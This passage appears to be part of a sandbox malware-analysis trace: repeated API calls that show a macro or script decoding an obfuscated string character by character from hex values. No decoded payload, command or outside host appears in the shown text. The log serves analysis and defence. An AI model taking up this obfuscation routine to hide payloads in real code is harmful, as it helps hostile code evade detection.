pvarResult=0xa025e80) returned 0x0 [0175.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0175.100] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.100] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.100] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.100] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.100] GetUserDefaultLCID () returned 0x409 [0175.100] malloc (_Size=0xa0) returned 0x11f50080 [0175.100] free (_Block=0x11f50080) [0175.100] VarBstrCat (in: bstrLeft="&H", bstrRight="e9", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.100] GetUserDefaultLCID () returned 0x409 [0175.100] VarI2FromStr (in: strIn="&He9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.101] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0175.101] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.101] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.101] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.101] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.101] GetUserDefaultLCID () returned 0x409 [0175.101] malloc (_Size=0xa0) returned 0x11f50080 [0175.101] free (_Block=0x11f50080) [0175.102] VarBstrCat (in: bstrLeft="&H", bstrRight="bc", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.102] GetUserDefaultLCID () returned 0x409 [0175.102] VarI2FromStr (in: strIn="&Hbc", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.102] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0175.102] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.102] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.102] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.102] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.102] GetUserDefaultLCID () returned 0x409 [0175.102] malloc (_Size=0xa0) returned 0x11f50080 [0175.103] free (_Block=0x11f50080) [0175.103] VarBstrCat (in: bstrLeft="&H", bstrRight="9a", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.103] GetUserDefaultLCID () returned 0x409 [0175.103] VarI2FromStr (in: strIn="&H9a", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.103] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0175.103] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.103] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.103] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.103] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.104] GetUserDefaultLCID () returned 0x409 [0175.104] malloc (_Size=0xa0) returned 0x11f50080 [0175.104] free (_Block=0x11f50080) [0175.104] VarBstrCat (in: bstrLeft="&H", bstrRight="a9", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.104] GetUserDefaultLCID () returned 0x409 [0175.104] VarI2FromStr (in: strIn="&Ha9", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.104] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="9") returned 1 [0175.104] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.104] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.104] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.104] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.104] GetUserDefaultLCID () returned 0x409 [0175.105] malloc (_Size=0xa0) returned 0x11f50080 [0175.105] free (_Block=0x11f50080) [0175.105] VarBstrCat (in: bstrLeft="&H", bstrRight="b4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.105] GetUserDefaultLCID () returned 0x409 [0175.105] VarI2FromStr (in: strIn="&Hb4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="m\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.105] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="G") returned 1 [0175.105] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.106] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.106] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.106] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.106] GetUserDefaultLCID () returned 0x409 [0175.106] malloc (_Size=0xa0) returned 0x11f50080 [0175.106] free (_Block=0x11f50080) [0175.106] VarBstrCat (in: bstrLeft="&H", bstrRight="d7", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.106] GetUserDefaultLCID () returned 0x409 [0175.106] VarI2FromStr (in: strIn="&Hd7", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.106] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0175.106] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.107] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.107] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.107] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.107] GetUserDefaultLCID () returned 0x409 [0175.107] malloc (_Size=0xa0) returned 0x11f50080 [0175.107] free (_Block=0x11f50080) [0175.107] VarBstrCat (in: bstrLeft="&H", bstrRight="c8", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.107] GetUserDefaultLCID () returned 0x409 [0175.107] VarI2FromStr (in: strIn="&Hc8", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.107] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="z") returned 1 [0175.107] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.108] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.108] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x1 [0175.108] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.108] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.108] GetUserDefaultLCID () returned 0x409 [0175.108] malloc (_Size=0xa0) returned 0x11f50080 [0175.108] free (_Block=0x11f50080) [0175.108] VarBstrCat (in: bstrLeft="&H", bstrRight="cb", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.108] GetUserDefaultLCID () returned 0x409 [0175.108] VarI2FromStr (in: strIn="&Hcb", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.108] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="Z") returned 1 [0175.109] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.109] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.109] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.109] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.109] GetUserDefaultLCID () returned 0x409 [0175.109] malloc (_Size=0xa0) returned 0x11f50080 [0175.109] free (_Block=0x11f50080) [0175.109] VarBstrCat (in: bstrLeft="&H", bstrRight="a4", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.109] GetUserDefaultLCID () returned 0x409 [0175.109] VarI2FromStr (in: strIn="&Ha4", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.109] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="6") returned 1 [0175.110] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.110] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.110] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.110] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.110] GetUserDefaultLCID () returned 0x409 [0175.110] malloc (_Size=0xa0) returned 0x11f50080 [0175.110] free (_Block=0x11f50080) [0175.110] VarBstrCat (in: bstrLeft="&H", bstrRight="c6", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.110] GetUserDefaultLCID () returned 0x409 [0175.110] VarI2FromStr (in: strIn="&Hc6", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.110] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x96539b8, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0175.111] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.111] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.111] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.111] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.111] GetUserDefaultLCID () returned 0x409 [0175.111] malloc (_Size=0xa0) returned 0x11f50080 [0175.111] free (_Block=0x11f50080) [0175.111] VarBstrCat (in: bstrLeft="&H", bstrRight="d5", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.111] GetUserDefaultLCID () returned 0x409 [0175.111] VarI2FromStr (in: strIn="&Hd5", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.111] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0175.112] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.112] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.112] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.112] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.112] GetUserDefaultLCID () returned 0x409 [0175.112] malloc (_Size=0xa0) returned 0x11f50080 [0175.112] free (_Block=0x11f50080) [0175.112] VarBstrCat (in: bstrLeft="&H", bstrRight="8e", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.112] GetUserDefaultLCID () returned 0x409 [0175.112] VarI2FromStr (in: strIn="&H8e", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.112] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="8") returned 1 [0175.113] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.113] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.113] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.113] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.113] GetUserDefaultLCID () returned 0x409 [0175.113] malloc (_Size=0xa0) returned 0x11f50080 [0175.113] free (_Block=0x11f50080) [0175.113] VarBstrCat (in: bstrLeft="&H", bstrRight="da", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.113] GetUserDefaultLCID () returned 0x409 [0175.113] VarI2FromStr (in: strIn="&Hda", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.113] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x9653bf8, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0175.114] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.114] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.114] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.114] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.114] GetUserDefaultLCID () returned 0x409 [0175.114] malloc (_Size=0xa0) returned 0x11f50080 [0175.114] free (_Block=0x11f50080) [0175.114] VarBstrCat (in: bstrLeft="&H", bstrRight="d1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.114] GetUserDefaultLCID () returned 0x409 [0175.114] VarI2FromStr (in: strIn="&Hd1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.114] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6db8, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0175.115] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.115] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.115] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.115] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.115] GetUserDefaultLCID () returned 0x409 [0175.115] malloc (_Size=0xa0) returned 0x11f50080 [0175.115] free (_Block=0x11f50080) [0175.115] VarBstrCat (in: bstrLeft="&H", bstrRight="7f", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.115] GetUserDefaultLCID () returned 0x409 [0175.115] VarI2FromStr (in: strIn="&H7f", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.115] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6de8, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0175.116] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.116] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.116] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.116] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.116] GetUserDefaultLCID () returned 0x409 [0175.116] malloc (_Size=0xa0) returned 0x11f50080 [0175.116] free (_Block=0x11f50080) [0175.116] VarBstrCat (in: bstrLeft="&H", bstrRight="d1", pbstrResult=0x1ddf00 | out: pbstrResult=0x1ddf00) returned 0x0 [0175.116] GetUserDefaultLCID () returned 0x409 [0175.116] VarI2FromStr (in: strIn="&Hd1", lcid=0x409, dwFlags=0x0, psOut=0x1ddef8 | out: psOut=0x1ddef8) returned 0x0 [0175.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x1ddec0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x9dâäþ\x07", lpUsedDefaultChar=0x0) returned 1 [0175.116] VarSub (in: pvarLeft=0xa025da8, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x7efed68, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0175.117] VarAdd (in: pvarLeft=0xa025ee8, pvarRight=0xa025d68, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.117] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.117] VarCmp (pvarLeft=0xa025ed0, pvarRight=0xa025e80, lcid=0x0, dwFlags=0x30001) returned 0x0 [0175.117] VarAdd (in: pvarLeft=0xa025ed0, pvarRight=0xa025eb8, pvarResult=0xa025e80 | out: pvarResult=0xa025e80) returned 0x0 [0175.117] GetUserDefaultLCID () returned 0x409 [0175.117] malloc (_Size=0xa0) returned 0x11f50080 